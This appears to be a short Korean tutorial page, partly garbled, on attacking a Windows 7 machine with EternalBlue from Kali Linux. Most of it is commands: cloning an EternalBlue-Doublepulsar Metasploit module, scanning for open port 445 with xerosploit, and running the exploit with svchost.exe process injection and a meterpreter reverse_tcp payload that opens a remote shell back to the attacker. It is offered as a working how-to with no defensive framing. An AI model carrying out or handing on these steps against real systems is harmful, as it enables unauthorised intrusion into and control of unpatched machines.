kali 아래 Eternalblue 공격 win 7

참고:https://www.youtube.com/watch?v=goUVgchVGB0 https://github.com/ElevenPaths/Eternalblue-Doublepulsar-Metasploit https://github.com/LionSec/xerosploit(이곳 을 통 해 얻 을 수 있 는 xerosploit 가 없습니다)더 자세 한 내용 은:http://www.jianshu.com/p/a34a3d560ffd
cd /tmp
git clone https://github.com/ElevenPaths/Eternalblue-Doublepulsar-Metasploit
mv eternalblue_doublepulsar.rb /usr/share/metasploit-framework/modules/exploits/windows/smb

xerosploit
scan
  IP
pscan
run
#       445   open 
#           ,          ,      IP  

msfconsole
use exploit/windows/smb/eternalblue_doublepulsar
set rhost   IP 
set PROCESSINJECT svchost.exe
set payload windows/meterpreter/reverse_tcp
set lhost    IP
exploit

좋은 웹페이지 즐겨찾기